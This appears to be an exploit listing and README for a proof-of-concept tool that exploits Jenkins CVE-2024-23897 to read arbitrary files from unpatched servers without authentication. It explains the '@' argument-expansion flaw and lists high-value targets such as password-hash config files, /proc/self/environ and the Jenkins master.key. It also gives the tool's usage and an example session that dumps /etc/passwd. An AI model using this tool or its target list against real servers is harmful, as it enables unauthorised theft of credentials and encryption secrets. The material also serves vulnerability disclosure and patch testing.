Exploit for Path Traversal in Jenkins CVE-2024-23897

## https://sploitus.com/exploit?id=CAFCCD1B-2769-5DD2-83A8-6487EC9F3A60
# CVE-2024-23897: Jenkins Arbitrary File Read

## Description

This Proof-of-Concept (POC) can be used to exploit CVE-2024-23897 to achieve file-read access on a Jenkins server <= version 2.441.

Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an `@` character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.

Severity: 7.5 HIGH Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

There is a severe limitation to this vulnerability, as binary files cannot be fully read. Some plaintext non-binary files that could be of interest:

- `/proc/self/environ` Environmental variables including `JENKINS_HOME`
- `/proc/self/cmdline` Command-line arguments
- `/etc/hosts` Linux local-DNS resolution
- `/etc/passwd` Linux user accounts
- `/var/jenkins_home/users/users.xml` User account storage locations
- `/var/jenkins_home/users/<user_directory>/config.xml` User BCrypt password hash
- `/var/jenkins_home/secrets/master.key` Encryption secret key

## Usage

```text
usage: jenkins_fileread.py [-h] -u URL [-f FILE] [-t TIMEOUT] [-s] [-o] [-p PROXY] [-v]

POC for CVE-2024-23897 (Jenkins file read)

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Jenkins URL
  -f FILE, --file FILE  File path to read
  -t TIMEOUT, --timeout TIMEOUT
                        Request timeout
  -s, --save            Save file contents
  -o, --overwrite       Overwrite existing files
  -p PROXY, --proxy PROXY
                        HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)
  -v, --verbose         Verbosity enabled - additional output flag
```

## Example

```sh
$ jenkins_fileread.py -u http://<target-ip>:8080
Welcome to the Jenkins file-read shell. Type help or ? to list commands.

file> /etc/passwd
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
root:x:0:0:root:/root:/bin/bash
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
jenkins:x:1000:1000::/var/jenkins_home:/bin/bash
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
```

## References

- [NIST CVE-2024-23897](https://nvd.nist.gov/vuln/detail/CVE-2024-23897)
- [Jenkins Security Advisory 2024-01-24](https://www.jenkins.io/security/advisory/2024-01-24/)
- [Excessive Expansion: Uncovering Critical Security Vulnerabilities in Jenkins](https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/)
- [Breaking Down CVE-2024-23897: PoC Code Surfaces Just After Jenkins Advisory](https://securityonline.info/breaking-down-cve-2024-23897-poc-code-surfaces-just-after-jenkins-advisory/)